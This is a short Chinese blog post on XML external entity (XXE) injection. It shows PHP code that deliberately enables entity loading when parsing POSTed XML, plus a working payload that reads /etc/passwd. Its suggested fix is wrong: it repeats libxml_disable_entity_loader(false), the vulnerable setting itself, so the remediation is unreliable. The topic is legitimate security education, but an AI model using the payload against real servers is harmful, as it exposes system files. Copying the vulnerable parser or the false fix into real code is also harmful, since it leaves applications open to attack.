XML实体注入漏洞

xiaohai 2021-05-15 21:22:12 1129人围观 标签: php 
简介XML实体注入漏洞

参考链接

<?php
libxml_disable_entity_loader(false);
//第一种
$data = isset($_POST['data'])?trim($_POST['data']):'';
$resp = '';
if($data != false){
    $xml = simplexml_load_string($data, 'SimpleXMLElement', LIBXML_NOENT); //必须要有这个SimpleXMLElement
    var_dump($xml); 
}

//第二种
$data = isset($_POST['data'])?trim($_POST['data']):'';
$resp = '';
if($data != false){
    $xml = new SimpleXMLElement($data, LIBXML_NOENT);
    var_dump($xml);
}
?>

那么POST的data数据为:

<?xml version="1.0"?>
<!DOCTYPE ANY [
    <!ENTITY content SYSTEM "file:///etc/passwd">
]>
<note>
    <name>&content;</name>
</note>

如果需要修复,只需要在前面加上:

libxml_disable_entity_loader(false);

相同类型文章

热门标签

每日一句

    要有最朴素的生活和最遥远的梦想,即使明天天寒地冻,山高水远,路远马亡。

    ——海子

今日排行

  • 嗨!Tauri

    Tauri 是一个框架,用于为所有主要桌面平台构建小巧、快速的二进制文件。开发人员可以集成任何可编译为 HTML、JS 和 CSS 的前端框架,以构建他们的用户界面。应用程序的后端是一个基于 Rust 的二进制文件,带有一个前端可以与之交互的 API。 Tauri 应用程序的用户界面目前在 macOS 和 Windows 上利用 tao 作为窗口处理库,在 Linux 上通过 Tauri 团队孵化和维护的 WRY 利用 WebKit、Windows 上的 WebView2 和 Linux 上的 WebKitGTK 创建一个统一的系统 webview(和其他好东西,如菜单和任务栏)接口。

  • 初中数学应熟记数值表(平方、立方、2的n次方、常用分数值)

    初中数学应熟记数值表(平方、立方、2的n次方、常用分数值)

  • 无向图(Undirected Graph)

    无向图(Undirected Graph)

  • yarn、npm配置阿里云国内镜像(新镜像)

    nodejs中使用npm和yarn,使用最新阿里云镜像 aliyun mirror,网上很多还是文章用的是下面这个地址~~yarn config set registry https://registry.npm.taobao.org~~

  • Centos中用Chrome将网页导出为PDF

    Centos中用Chrome将网页导出为PDF,chrome --headless --print-to-pdf https://developer.chrome.com/

点击排行

友情链接